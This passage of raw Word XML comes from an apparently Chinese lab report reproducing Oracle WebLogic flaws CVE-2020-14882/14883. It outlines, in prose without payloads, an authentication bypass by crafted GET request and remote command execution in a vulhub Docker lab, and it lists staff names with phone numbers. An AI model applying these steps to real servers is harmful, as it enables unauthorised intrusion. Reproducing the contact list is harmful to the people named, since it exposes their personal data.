              <w:widowControl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 w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="7DC495B9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32B1DFA4" w14:textId="05A08D38" w:rsidR="008F6264" w:rsidRDefault="000E35E9">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLineChars="0" w:firstLine="0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>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CDD69AC" w14:textId="02726C2A" w:rsidR="008F6264" w:rsidRDefault="000E35E9" w:rsidP="007D4FC3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CVE-2020-1488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="052BD630" w14:textId="464351B2" w:rsidR="008F6264" w:rsidRDefault="007D4FC3" w:rsidP="007D4FC3">
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79B0D370" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc7481"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0FAC6BFF" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>
        <w:tblW w:w="5000" w:type="pct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C86C72" w14:paraId="1894AEAC" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="76DC51ED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攻击路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D3FEDDA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远程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86C72" w14:paraId="646A50AE" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1AFDB44F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攻击复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11FAFA8B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容易</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86C72" w14:paraId="1DCFAC53" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5DA6072A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权限要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="456DBBEF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无需权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86C72" w14:paraId="6FA00E68" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4312A03A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影响范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C99B420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全局影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86C72" w14:paraId="4674104F" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A55A35D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数据保密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72692317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数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86C72" w14:paraId="70DE02FD" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6DA2705A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数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BBD1BBE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传输被破坏</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86C72" w14:paraId="0B54391F" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1025A23E" w14:textId="77777777" w:rsidR="00C86C72" w:rsidRDefault="00C86C72" w:rsidP="00370FA1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0ECDE198" w14:textId="1A6625AA" w:rsidR="00C86C72" w:rsidRDefault="00A107A2" w:rsidP="00370FA1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>被提取权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64B7D64C" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="7BA51871" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8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9"/>
    </w:p>
    <w:p w14:paraId="208A63F3" w14:textId="77777777" w:rsidR="008600AC" w:rsidRDefault="00AA5F05" w:rsidP="008600AC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc13939"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="0" w:space="0" w:color="DEE0E3"/>
          <w:left w:val="single" w:sz="0" w:space="0" w:color="DEE0E3"/>
          <w:bottom w:val="single" w:sz="0" w:space="0" w:color="DEE0E3"/>
          <w:right w:val="single" w:sz="0" w:space="0" w:color="DEE0E3"/>
          <w:insideH w:val="single" w:sz="0" w:space="0" w:color="DEE0E3"/>
          <w:insideV w:val="single" w:sz="0" w:space="0" w:color="DEE0E3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55"/>
        <w:gridCol w:w="2055"/>
        <w:gridCol w:w="2055"/>
        <w:gridCol w:w="2055"/>
      </w:tblGrid>
      <w:tr w:rsidR="008600AC" w14:paraId="337162FD" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="671"/>
        </w:trPr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293019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序号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273294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职务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CC4F93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姓名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15A541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联系方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008600AC" w14:paraId="28C9CB2E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EF5C7A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BB829F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组长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8EE07D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侯博文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46BCE8" w14:textId="15358E30" w:rsidR="008600AC" w:rsidRDefault="008600AC" w:rsidP="00370FA1">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00925EE0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>13022498745</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008600AC" w14:paraId="7496190A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8459D7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2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777B83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CA300D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陆皓喆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A225EE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15058298819</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008600AC" w14:paraId="1D8193DE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B7EF5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3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524D41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6A7EB2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郝志成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8B4276" w14:textId="0BF8679B" w:rsidR="008600AC" w:rsidRDefault="005358AD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15063560713</w:t>
            </w:r>
            <w:r w:rsidR="008600AC"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8600AC" w14:paraId="59BEBC25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126DD0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4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0B86F3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44EF92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秦德龙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A77EF7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 w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16622753767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</w:tr>
      <w:tr w:rsidR="008600AC" w14:paraId="753A547A" w14:textId="77777777" w:rsidTr="00370FA1"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44BF4C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5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6B70A5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组员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CD3FF5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>胡博浩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="205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1B87EE" w14:textId="77777777" w:rsidR="008600AC" w:rsidRDefault="008600AC" w:rsidP="00370FA1">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 18270856986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FE6BFBD" w14:textId="5FC19552" w:rsidR="008F6264" w:rsidRDefault="00AA5F05" w:rsidP="008600AC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="72568202" w14:textId="62F305C3" w:rsidR="008F6264" w:rsidRDefault="003D1839">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Oracle WebLogic Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC68A72" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc7909"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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43"/>
        <w:gridCol w:w="4376"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6264" w14:paraId="30343B6F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ABA4435" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D7646C" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F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工作内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="01BA39EF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ED8CDA4" w14:textId="084C4A4F" w:rsidR="008F6264" w:rsidRDefault="00932005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环境搭建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E55EEE2" w14:textId="07292F08" w:rsidR="008F6264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利用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v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ulhub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中的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环境，搭建</w:t>
            </w:r>
            <w:r w:rsidR="00932005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d</w:t>
            </w:r>
            <w:r w:rsidR="00932005">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>ocker</w:t>
            </w:r>
            <w:r w:rsidR="00932005">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境，访问目标端口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="0C09A0C2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="604D3387" w14:textId="1743CE0C" w:rsidR="008F6264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漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1E8118" w14:textId="5AEB23E5" w:rsidR="003D1839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color w:val="000000" w:themeColor="text1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1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构造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H</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>TTP GET</w:t>
            </w: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请求绕过身份验证进入后台，复现</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE-2020-1488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB694AB" w14:textId="0634E604" w:rsidR="003D1839" w:rsidRDefault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lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="00000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构建请求，抓包并修改，使请求</w:t>
            </w:r>
            <w:r w:rsidRPr="003D1839">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>可以执行在目标位置添加文件‘</w:t>
            </w:r>
            <w:r w:rsidRPr="003D1839">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>123.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="003D1839">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>’的命令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，复现</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE-2020-1488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBEBA9C" w14:textId="7FD16AA8" w:rsidR="008F6264" w:rsidRPr="003D1839" w:rsidRDefault="003D1839" w:rsidP="003D1839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szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在目标机中检查命令执行是否成功，检验漏洞的可利用性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="2BAB16D6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6091AB27" w14:textId="3C3F0FCA" w:rsidR="008F6264" w:rsidRDefault="00853D6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修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F5FDCEC" w14:textId="001D9DE1" w:rsidR="008F6264" w:rsidRDefault="00853D68">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>更新官方补丁即可。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F6D79FB" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1860"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="87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3"/>
        <w:gridCol w:w="1651"/>
        <w:gridCol w:w="5721"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6264" w14:paraId="481A923E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65ED69FF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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60085757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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B0BA08A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风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="0918A6FA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3E6932A2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651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64C85015" w14:textId="3867DF3E" w:rsidR="008F6264" w:rsidRDefault="00890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73B530A9" w14:textId="005C635A" w:rsidR="008F6264" w:rsidRDefault="00890CB4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24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可通过构造特殊的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 xml:space="preserve"> HTTP GET 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请求</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>，在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未经身份验证的情况下</w:t>
            </w:r>
            <w:r w:rsidR="00E40801">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidR="00E40801">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidR="00E40801">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>logic Server Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="3B297EDB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1403" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11CA87BC" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F0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651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21C5F2A4" w14:textId="03EC1934" w:rsidR="008F6264" w:rsidRDefault="00890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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41FA5206" w14:textId="3F9DF649" w:rsidR="008F6264" w:rsidRDefault="00890CB4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可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执行任意代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="408ABBB9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="25507C47" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1"/>
